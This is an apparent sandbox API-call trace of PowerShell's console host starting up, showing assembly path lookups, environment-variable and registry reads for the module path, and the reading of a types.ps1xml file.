	[0275.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0276.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0276.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0276.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0276.045] SetConsoleCtrlHandler (HandlerRoutine=0x29e68dc, Add=1) returned 1
	[0276.579] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c4
	[0276.580] CoCreateGuid (in: pguid=0x1adbb0 | out: pguid=0x1adbb0*(Data1=0x774185bb, Data2=0xfaad, Data3=0x4cb9, Data4=([0]=0xbf, [1]=0x8e, [2]=0xa2, [3]=0xfd, [4]=0xe9, [5]=0x99, [6]=0x82, [7]=0x3))) returned 0x0
	[0276.581] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0276.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.581] CoTaskMemFree (pv=0x329c00) 
	[0276.584] WinSqmIsOptedIn () returned 0x0
	[0276.585] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0276.585] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.585] CoTaskMemFree (pv=0x329c00) 
	[0276.586] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0276.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.586] CoTaskMemFree (pv=0x329c00) 
	[0276.587] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0276.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.587] CoTaskMemFree (pv=0x329c00) 
	[0276.587] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0276.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.587] CoTaskMemFree (pv=0x329c00) 
	[0276.588] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0276.588] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.588] CoTaskMemFree (pv=0x329c00) 
	[0276.590] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0276.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.590] CoTaskMemFree (pv=0x329c00) 
	[0276.590] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0276.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.590] CoTaskMemFree (pv=0x329c00) 
	[0276.591] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0276.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.591] CoTaskMemFree (pv=0x329c00) 
	[0276.594] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0276.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.594] CoTaskMemFree (pv=0x329c00) 
	[0276.599] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0276.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.599] CoTaskMemFree (pv=0x329c00) 
	[0276.599] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0276.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.600] CoTaskMemFree (pv=0x329c00) 
	[0276.600] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0276.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.600] CoTaskMemFree (pv=0x329c00) 
	[0280.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.282] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0281.282] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0281.282] CoTaskMemFree (pv=0x329c00) 
	[0281.283] CoTaskMemAlloc (cb=0xcc) returned 0x1b706320
	[0281.283] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b706320, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0281.284] CoTaskMemFree (pv=0x1b706320) 
	[0281.284] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad728 | out: phkResult=0x1ad728*=0x1c8) returned 0x0
	[0281.284] RegQueryValueExW (in: hKey=0x1c8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad6ac, lpData=0x0, lpcbData=0x1ad6a8*=0x0 | out: lpType=0x1ad6ac*=0x2, lpData=0x0, lpcbData=0x1ad6a8*=0x6c) returned 0x0
	[0281.284] CoTaskMemAlloc (cb=0x70) returned 0x37ab40
	[0281.284] RegQueryValueExW (in: hKey=0x1c8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad67c, lpData=0x37ab40, lpcbData=0x1ad678*=0x6c | out: lpType=0x1ad67c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1ad678*=0x6c) returned 0x0
	[0281.284] CoTaskMemFree (pv=0x37ab40) 
	[0281.284] CoTaskMemAlloc (cb=0xcc) returned 0x1b706320
	[0281.284] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b706320, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0281.284] CoTaskMemFree (pv=0x1b706320) 
	[0281.284] CoTaskMemAlloc (cb=0xcc) returned 0x1b706320
	[0281.284] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b706320, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0281.284] CoTaskMemFree (pv=0x1b706320) 
	[0281.288] RegCloseKey (hKey=0x1c8) returned 0x0
	[0281.288] CoTaskMemAlloc (cb=0xcc) returned 0x1b706320
	[0281.288] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b706320, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0281.288] CoTaskMemFree (pv=0x1b706320) 
	[0281.288] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad728 | out: phkResult=0x1ad728*=0x1c8) returned 0x0
	[0281.288] RegQueryValueExW (in: hKey=0x1c8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad6ac, lpData=0x0, lpcbData=0x1ad6a8*=0x0 | out: lpType=0x1ad6ac*=0x0, lpData=0x0, lpcbData=0x1ad6a8*=0x0) returned 0x2
	[0281.289] RegCloseKey (hKey=0x1c8) returned 0x0
	[0281.293] CoTaskMemAlloc (cb=0x20c) returned 0x3d74d0
	[0281.293] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3d74d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0281.294] CoTaskMemFree (pv=0x3d74d0) 
	[0281.294] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0281.295] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0281.300] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0281.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0281.300] CoTaskMemFree (pv=0x329c00) 
	[0281.302] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0281.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0281.302] CoTaskMemFree (pv=0x329c00) 
	[0281.308] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0281.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0281.308] CoTaskMemFree (pv=0x329c00) 
	[0281.309] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0281.309] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0281.309] CoTaskMemFree (pv=0x329c00) 
	[0281.310] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad518 | out: phkResult=0x1ad518*=0x32c) returned 0x0
	[0281.311] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x1ad52c, lpData=0x0, lpcbData=0x1ad528*=0x0 | out: lpType=0x1ad52c*=0x1, lpData=0x0, lpcbData=0x1ad528*=0x74) returned 0x0
	[0281.312] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x1ad49c, lpData=0x0, lpcbData=0x1ad498*=0x0 | out: lpType=0x1ad49c*=0x1, lpData=0x0, lpcbData=0x1ad498*=0x74) returned 0x0
	[0281.312] CoTaskMemAlloc (cb=0x78) returned 0x37ab40
	[0281.312] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x1ad46c, lpData=0x37ab40, lpcbData=0x1ad468*=0x74 | out: lpType=0x1ad46c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ad468*=0x74) returned 0x0
	[0281.312] CoTaskMemFree (pv=0x37ab40) 
	[0281.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ad1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0281.312] SetErrorMode (uMode=0x1) returned 0x1
	[0281.312] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ad3f0 | out: lpFileInformation=0x1ad3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0281.312] SetErrorMode (uMode=0x1) returned 0x1
	[0281.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0281.313] SetErrorMode (uMode=0x1) returned 0x1
	[0281.313] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad3f0 | out: lpFileInformation=0x1ad3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0281.313] SetErrorMode (uMode=0x1) returned 0x1
	[0281.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0281.316] SetErrorMode (uMode=0x1) returned 0x1
	[0281.316] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad3f0 | out: lpFileInformation=0x1ad3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0281.316] SetErrorMode (uMode=0x1) returned 0x1
	[0281.317] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0281.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0281.317] CoTaskMemFree (pv=0x329c00) 
	[0281.318] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0281.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0281.318] CoTaskMemFree (pv=0x329c00) 
	[0281.319] GetACP () returned 0x4e4
	[0282.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0282.026] SetErrorMode (uMode=0x1) returned 0x1
	[0282.026] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0282.027] GetFileType (hFile=0x330) returned 0x1
	[0282.027] SetErrorMode (uMode=0x1) returned 0x1
	[0282.027] GetFileType (hFile=0x330) returned 0x1
	[0282.028] ReadFile (in: hFile=0x330, lpBuffer=0x2dca400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2dca400*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0282.030] ReadFile (in: hFile=0x330, lpBuffer=0x2dca400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2dca400*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0282.030] ReadFile (in: hFile=0x330, lpBuffer=0x2dca400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2dca400*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0282.030] ReadFile (in: hFile=0x330, lpBuffer=0x2dca400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2dca400*, lpNumberOfBytesRead=0x1ad328*=0xcf3, lpOverlapped=0x0) returned 1
	[0282.030] ReadFile (in: hFile=0x330, lpBuffer=0x2dc985b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2dc985b*, lpNumberOfBytesRead=0x1ad328*=0x0, lpOverlapped=0x0) returned 1
	[0282.030] ReadFile (in: hFile=0x330, lpBuffer=0x2dca400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2dca400*, lpNumberOfBytesRead=0x1ad328*=0x0, lpOverlapped=0x0) returned 1
